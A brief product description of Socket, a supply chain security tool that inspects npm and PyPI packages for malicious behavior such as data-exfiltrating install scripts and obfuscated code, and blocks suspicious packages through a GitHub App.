socket.dev

Socket is a supply chain security tool that analyzes npm and PyPI packages for malicious behavior by examining package behavior rather than just matching against known vulnerability databases. It detects install scripts that exfiltrate data, packages with obfuscated code, newly published maintainers with suspicious history, and other supply chain attack indicators.

Socket integrates as a GitHub App to block suspicious packages before they enter a project.